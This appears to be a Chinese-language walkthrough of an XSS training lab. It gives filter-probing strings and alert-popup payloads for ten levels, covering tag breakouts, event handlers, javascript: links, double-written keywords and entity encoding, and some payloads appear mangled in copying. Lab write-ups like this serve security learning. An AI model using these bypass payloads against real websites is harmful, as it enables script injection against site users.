xss 通过秘籍
终极测试代码
<sCr<ScRiPt>IPT>OonN'"\/(hrHRefEF)</sCr</ScRiPt>IPT>第一关(没有任何过滤)
使用终极测试代码,查看源码
发现没有任何过滤,直接使用javascrupt中的alert弹框
<script>alert('wj')</script>
第二关(闭合方式)
先用终极测试代码,查看源码
<input name=keyword value="<script>alert(/xss/)</script>">
我们要先闭合前面,然后注释掉后面
<input name=keyword value=""><script>alert(/xss/)</script>//">
"><script>alert(/wj/)<script>//
第三关(过滤 < 和 ")
先用终极测试代码,查看源码
value='<sCr<ScRiPt>IPT>OonN'"\/(hrHRefEF)</sCr</ScRiPt>
IPT>'>
发现< 和 " 被实体化,不能使用,但是我们可以使用Javascript事件。这里使用onblur事件。然后闭合方式是 '
<input name=keyword value=' 'οnblur='alert(/xss/)' ''>
'onblur='alert(/1/)'
第四关(注意闭合方式)
先用终极测试代码,查看源码
发现没有变化
我们尝试第三关的方式,注意:这里的闭关方式是 "
<input name=keyword value=" "οnblur='alert(/1/)' ">
"onblur='alert(/1/)'
第五关(大小写,script,on.)
先用终极测试代码,查看源码
value="<scr<scr_ipt>ipt>oo_nn'"\/(hrhrefef)</scr</script>ipt>"
过滤了大小写,script,on.
javascript 伪协议 a标签要独立运行,所以要闭合前面的<input>标签
value=" "><a href= "javascript:alert(/xss/)">click me</a> "
"><a href = "javascript:alert('wj')">click me</a>
第六关(过滤了on)
先用终极测试代码,查看源码
value="<sCr<ScRiPt>IPT>Oo_nN'"\/(hrHRefEF)</sCr</ScRiPt>IPT>"
过滤了on,
value=""><a href = "javascript:alert('wj')">click me</a>"
"><a hRef = "javascript:alert('wj')">click me</a>
第七关(过滤)
我们用第六关的代码试试
<input name=keyword value=""><a = "java:alert('wj')">click me</a>">
发现href和script被过滤了,我们可以试试双写
<input name=keyword value=" "><scrscriptipt>alert(/xss/)</scrscriptipt>">
"><scrscriptipt>alert(/xss/)</scrscriptipt>
第八关(html编码)
先用终极测试代码,查看源码
value="<scr<script>ipt>oonn'"\/(hrhrefef)</scr</script>ipt>">
发现过滤了大小写,< .所以使用html实体编码。
javascript:alert('wj')javascript:al
ert('wj')
第九关(格式http://)
使用第八关方式,发现代码不合法。需要使用http://.
javascript:a
lert('wj')//http://
第十关(搜索框被隐藏)
发现没有搜索框,查看源码
发现是使用了hidden,隐藏了
我们可以修改他,让hidden失去作用
<input name="t_sort" value="" οnblur= 'alert(/xss/)' >type="hidden">
onblur='alert(/1/)'>
相关文章:
xss 通过秘籍
终极测试代码 <sCr<ScRiPt>IPT>OonN"\/(hrHRefEF)</sCr</ScRiPt>IPT> 第一关(没有任何过滤) 使用终极测试代码,查看源码 发现没有任何过滤,直接使用javascrupt中的alert弹框 <script>aler…...
Kibana使用Watcher监控服务日志并发送飞书报警(Markdown)
Watcher是什么 Kibana Watcher 是 Elasticsearch 的监控和告警工具,它允许你设置和管理告警规则以监控 Elasticsearch 数据和集群的状态。Kibana Watcher 可以监测各种指标和数据,然后在满足特定条件时触发警报。它提供了一种强大的方式来实时监控 Elas…...
Flutter笔记:光影动画按钮、滚动图标卡片组等
Flutter笔记 scale_design更新:光影动画按钮、滚动图标卡片组 作者:李俊才 (jcLee95):https://blog.csdn.net/qq_28550263 邮箱 :291148484163.com 本文地址:https://blog.csdn.net/qq_28550263…...
【论文】利用移动性的比例公平蜂窝调度测量和算法
(一支笔一包烟,一节论文看一天 )(一张纸一瓶酒,一道公式推一宿) 摘要1. 引言2. 相关工作3. 模型和问题公式4. 预测FPF调度 ( P F ) 2 S (PF)^2S (…...
内存条选购注意事项(电脑,笔记本)
电脑内存条的作用、选购技巧以及注意事项详解 - 郝光明的个人空间 - OSCHINA - 中文开源技术交流社区 现在的电脑直接和内存条联系 电脑上的所有输入和输出都只能依靠内存条 现在买双条而不是单条 买两个相同的内存条最好 笔记本先分清是低电压还是标准电压,DD…...
ChatGPT 宕机?OpenAI 将中断归咎于 DDoS 攻击
您的 ChatGPT 已关闭吗?您是否遇到 ChatGPT 问题,例如连接问题或遇到“长响应时出现网络错误”?– ChatGPT 遭受了一系列 DDoS 攻击,显然是由匿名苏丹组织策划的。 OpenAI 的 ChatGPT 是一款流行的人工智能聊天机器人,…...
go单元格测试
编写单元测试(Unit Test)是一种测试方法,用于验证代码中的单个功能单元(通常是函数或方法)是否按照预期工作。以下是编写单元测试的一般步骤: 1. 创建测试文件:在项目的测试目录中创建一个新的…...
JavaScript理解表达式和语句的含义
JavaScript中的表达式和语句都是用于完成特定计算或操作的语言构件,但它们有着不同的含义和用途: 表达式(expression)是用来计算并返回一个值的代码片段,可以包含变量、数值、函数调用、运算符等。表达式的运算结果可以被赋值给变量、作为函数…...
Visual Studio导入Wiinform项目文件,引用显示黄色感叹号
参考博客 第一步: 开程序包管理控制台 vs->工具->NuGet包管理器->程序包管理控制台 Update-Package –reinstall 第二步: 删除.csproj 文件片段 // 整个模块全部删除 包括标签中所含有的任何内容 <Target Name"EnsureNuGetPackage…...
深入研究SVN代码检查的关键工具:svnchecker vs. SonarQube,选择最适合你的代码检查工具
目录 一、SVN代码检查(整合svnchecker)1、创建SVN代码库2、下载安装包3、修改SVN配置4、新建代码检查配置文件(名称自定义)5、hooks目录添加配置文件6、设置只对Java文件进行检查7、测试 二、SonarQube代码检测1、什么是SonarQube2、MySQL数据库的安装3、SonarQube服务端软件安…...
博客积分上一万一千了
博客积分上一万一千了 充满自信,继续前进。...
docker 构建并运行 python项目
此处不重述docker安装及基本命令,可参考另一篇文章centos7 安装 docker_centos7 docker network rm-CSDN博客文章浏览阅读111次。1、 1.1 docker 官网 Empowering App Development for Developers | DockerLearn how Docker helps developers bring their ideas to …...
django建站过程(4)创建文档显示页面
django建站过程(4)创建文档显示页面 创建文档显示页面项目主文件夹schoolapps中的文件urls.py在APP“baseapps”中创建url.py文件编写视图模板继承bootstrap创建head.html创建doclist.html创建docdetail.html 使用 markdown 编辑器安装模块Model 模型的d…...
uniapp本地存储的几种方式
在UniApp中,你可以使用本地存储来保存和获取数据,以便在应用的不同页面之间共享数据或在应用关闭后仍然保存数据。UniApp提供了两种主要的本地存储方式:uni.setStorage 和 uni.getStorage,以及 uni.removeStorage 用于删除数据。这…...
74hc595模块参考
74hc595模块参考 8位串行并行输出(SIPO)移位寄存器 使用74HC595移位寄存器扩展微控制器上的输出引脚数量。如果你需要扩充输入引脚的数量那么你需要74HC165移位寄存器。 SER(串行输入)引脚用于一次一位地将数据发送到移位寄存器…...
【Unity细节】Failed importing package???Unity导包失败?
👨💻个人主页:元宇宙-秩沅 hallo 欢迎 点赞👍 收藏⭐ 留言📝 加关注✅! 本文由 秩沅 原创 😶🌫️收录于专栏:unity细节和bug 😶🌫️优质专栏 ⭐【…...
【问题记录】docker pull 镜像的时候 devel 版本和无 devel 版本的差别
这两个Docker镜像的主要区别在于是否包含了 CUDA 的开发工具集(CUDA Toolkit)。 docker pull cnstark/pytorch:1.10.0-py3.8.16-cuda11.1.1-ubuntu20.04这个镜像只包含运行时所需的库文件,并没有额外安装CUDA Toolkit。 docker pull cnstar…...
前后端跨域/ 同时运行两个项目
(1)后端配置端口 server:port: 90 (2)前端 配置跨域资源共享(CORS) devServer: {disableHostCheck: true,port: 8088,proxy: {/openapi: {target: http://192.168.31.109:90,ws: false,changeOrigin: true…...
进制的转换
1、进制的转化 (1)进制介绍 对于进制,有四种表示方法: 1)二进制:0,1,满2进1,C语言中没有二进制常数的表示方法 2)八进制:0-7,满8进1 3࿰…...
计算机简介
一、是什么 计算机(computer)俗称电脑,是现代一种用于高速计算的电子计算机器,可以进行数值计算,又可以进行逻辑计算,还具有存储记忆功能。是能够按照程序运行,自动、高速处理海量数据的现代化…...
如何轻松重置IDE试用期:终极JetBrains插件配置指南
如何轻松重置IDE试用期:终极JetBrains插件配置指南 【免费下载链接】ide-eval-resetter 项目地址: https://gitcode.com/gh_mirrors/id/ide-eval-resetter 你是否曾经在使用JetBrains系列IDE时,突然发现30天的试用期已经结束?那种感觉…...
雪女-斗罗大陆-造相Z-Turbo在元宇宙中的应用:为用户虚拟化身生成个性化动漫形象
雪女-斗罗大陆-造相Z-Turbo在元宇宙中的应用:为用户虚拟化身生成个性化动漫形象 想象一下,你正准备进入一个热闹的虚拟世界,参加一场线上聚会。别人都顶着一个系统默认的、千篇一律的方块人形象,而你,却拥有一个完全根…...
)
用字节扣子工作流,5分钟把小说变成AI解说视频(附完整流程)
5分钟零代码实战:用字节扣子工作流将小说变身高流量解说视频 在短视频内容爆炸的时代,"一口看完XX小说"这类AI解说视频正以惊人的速度占领抖音、B站的流量高地。作为个人创作者,你是否也想过批量生产这类内容,却苦于剪辑…...
YOLOv8配置文件default.yaml:从入门到精通的实战调优指南
1. YOLOv8配置文件default.yaml的核心作用 第一次打开YOLOv8的default.yaml配置文件时,我对着密密麻麻的参数列表发呆了半小时。这个看似普通的文本文件,实际上是控制整个目标检测模型训练过程的"中枢神经系统"。它就像汽车的中控台——方向盘…...
Spring Boot 4.0发布倒计时72小时:这份内部泄露的Agent性能基准测试报告,已助17家头部企业提前锁定RT<50ms SLA
第一章:Spring Boot 4.0 Agent-Ready 架构概览Spring Boot 4.0 引入了原生支持 Java Agent 的运行时架构设计,标志着框架从“启动即固化”向“运行时可塑”范式的重大演进。该架构将可观测性、动态配置、字节码增强与安全策略注入等能力下沉至 JVM 层级&…...
CC-Link IE转Modbus TCP集成实战:耐达讯自动化网关在五星级酒店节能改造中的应用
在工业自动化系统集成领域,异构网络的数据交互始终是一个核心痛点。控制层普遍采用高性能的CC-Link IE工业以太网,以确保高速、确定的实时通信;而设备层往往存在大量基于Modbus TCP协议的通用设备,如变频器、智能仪表和传感器。这…...
从0到1搭建可靠消息链路:RocketMQ重试 + Redis幂等实战
三方消息对接为什么总翻车?一套 RocketMQ Redis 幂等 的工业级解法(含架构图伪代码) 🔥 适合收藏:三方平台对接、商品/订单同步、消息中台治理 ✅ 你将收获:一套可直接落地的“拉取-发送-消费-重试-幂等-补…...
Moe-Counter:让网站计数变得萌萌哒的终极解决方案
Moe-Counter:让网站计数变得萌萌哒的终极解决方案 【免费下载链接】Moe-Counter Moe counter badge with multiple themes! - 多种风格可选的萌萌计数器 项目地址: https://gitcode.com/gh_mirrors/mo/Moe-Counter Moe-Counter 是一款功能强大且风格多样的萌…...
腕带硬件选型方案
一、核心处理器选型 二、心率与血氧检测模块选型 2.1 选型方案:JFC103 2.1.1 发光源 1. 绿色 功能:心率测量与脉搏波形(心律波形) 采集。 原因:绿光穿透表皮后,被血液吸收的程度会随心脏搏动而周期性变化。相比红光,绿光在皮肤浅层对血流灌注变化的敏感度最高,信噪比…...
全自动铺布机选购指南:核心指标与品牌实力评估
投资一台全自动铺布机是企业的重要决策。如何在海量品牌中做出最优选择?关键在于穿透营销宣传,从“硬指标”和“软实力”两个维度进行综合评估。核心性能指标张力控制精度:这是衡量铺布机性能的核心指标。直接决定能否处理针织、弹力、真丝等…...